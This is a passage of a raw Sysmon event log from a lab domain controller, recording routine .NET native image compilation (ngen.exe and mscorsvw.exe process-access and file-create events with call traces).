\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:07.016{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915B-6005-5E02-00000000A301}2128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:07.000{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-915B-6005-5E02-00000000A301}2128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:07.000{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915B-6005-5E02-00000000A301}2128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:08.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915C-6005-6102-00000000A301}3664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:08.594{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-915C-6005-6102-00000000A301}3664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:08.594{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915C-6005-6102-00000000A301}3664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:08.453{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915C-6005-6002-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:08.453{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-915C-6005-6002-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:08.453{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915C-6005-6002-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:08.359{59A5CD1D-915B-6005-5F02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\dac-0\System.Data.Entity.Design.dll2021-01-18 13:47:08.359 10341000x80000000000000006598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:10.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915E-6005-6302-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:10.672{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-915E-6005-6302-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:10.672{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915E-6005-6302-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:10.547{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915E-6005-6202-00000000A301}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:10.531{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-915E-6005-6202-00000000A301}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:10.531{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915E-6005-6202-00000000A301}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:10.406{59A5CD1D-915C-6005-6102-00000000A301}3664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e50-0\System.Data.Linq.dll2021-01-18 13:47:10.406 10341000x80000000000000006605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:11.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915F-6005-6502-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:11.875{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-915F-6005-6502-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:11.875{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915F-6005-6502-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:11.531{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915F-6005-6402-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:11.531{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-915F-6005-6402-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:11.531{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915F-6005-6402-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:11.437{59A5CD1D-915E-6005-6302-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\370-0\System.Data.OracleClient.dll2021-01-18 13:47:11.437 10341000x80000000000000006612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:13.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9161-6005-6702-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:13.687{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9161-6005-6702-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:13.687{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9161-6005-6702-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 